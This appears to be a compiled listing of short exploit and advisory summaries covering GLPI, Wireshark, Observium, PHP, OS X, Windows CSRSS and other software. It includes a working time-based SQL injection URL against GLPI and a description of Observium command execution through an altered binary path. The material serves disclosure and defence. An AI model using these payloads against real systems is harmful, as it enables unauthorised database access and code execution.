High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in a popular Information Resource Manager (IRM) system GLPI. IRM systems are usually used for management and audit of software packages, providing ITIL-compliant service desk. The vulnerability allows remote non-authenticated attacker to execute arbitrary SQL queries, read and write data to the application's database and completely compromise the vulnerable system. The vulnerability exists due to insufficient filtration of user-supplied data passed via the "page_limit" HTTP GET parameter to "/ajax/getDropdownConnect.php" PHP script. A remote unauthenticated attacker can alter present SQL query, inject and execute arbitrary SQL command in application's database. Below is a simple SQL Injection exploit, which uses time-based exploitation technique. The page will load time will be significantly higher if MySQL version is 5.X or superior: http://[host]/ajax/getDropdownConnect.php?fromtype=Computer&itemtype=Computer&page=1&page_limit=1%20PROCEDURE%20analyse%28%28select%20extractvalue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,%20BENCHMARK%285000000,SHA1%281%29%29,1%29%29%29%29,1%29
A static out-of-bounds memory read vulnerability was discovered in Wireshark, which is a free and open-source packet analyzer. The vulnerability can be triggered by feeding a malformed file to tshark. The vulnerability can be observed in an ASAN build of Wireshark, and can lead to a crash.
The crash due to an assertion failure can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark. The crash occurs when the alloc_address_wmem function is called with an addr_data parameter that is NULL.
This exploit is for RATS 2.3 which is a Rough Auditing Tool for Security. The exploit is for an Out of Block Array Crash which is caused when an array is declared outside of the block scope. This causes a crash when the program is run.
Merit Lilin Enterprise Co., Ltd. has released a security advisory for multiple vulnerabilities in its L series products with firmware 1.4.36/1.2.02, OS Version: Linux 2.6.38/Linux 2.6.32. The vulnerabilities include Multiple Cross-site Request Forgery, Multiple Cross-site Scripting/HTML Injection, Hard-coded credentials, Cleartext sensitive data, Weak Passwords/Known credentials, Account lockout, Poorly Protected Credentials. These vulnerabilities affect the device administrative interface, authentication, and authorization.
Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 using any user on Observium (even low privileged) we can trigger a code execution. For example, setting up a listener and a CSRF.
Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more. Due to lack of CSRF protection, it is possible to create an additional administrator user, or change the current administrator password since it does not ask for the previous password before changing it.
An integer wrap may occur in PHP 7.x before version 7.0.6 when reading zip files with the getFromIndex() and getFromName() methods of ZipArchive, resulting in a heap overflow. With sb.size from (1) being zip_uint64_t uncomp_size; /* (cl) size of uncompressed data */ and zip_uint64_t size; /* size of file (uncompressed) */ from zip_stat_t *st. Whereas len is signed and has a platform-dependent size. When len is larger than sb.size, len is truncated to sb.size in (2) and the heap overflow occurs in (3).
Mach Race OS X Local Privilege Escalation Exploit is a SUID, SIP, and binary entitlements universal OS X exploit (CVE-2016-1757). It is used to exploit a race condition in the Mach bootstrap subsystem. The exploit works by creating a Mach service with a predictable name and then racing against the kernel to register a receive right for that service. The exploit is used against a SUID binary or an entitled binary to bypass SIP. It is tested against Mavericks 10.10.5, Yosemite 10.10.5, El Capitan 10.11.2 and 10.11.3 and is fixed in El Capitan 10.11.4. It should work with all OS X versions.
The CSRSS BaseSrv RPC call BaseSrvCheckVDM allows you to create a new process with the anonymous token, which results on a new process in session 0 which can be abused to elevate privileges.
Services By CQR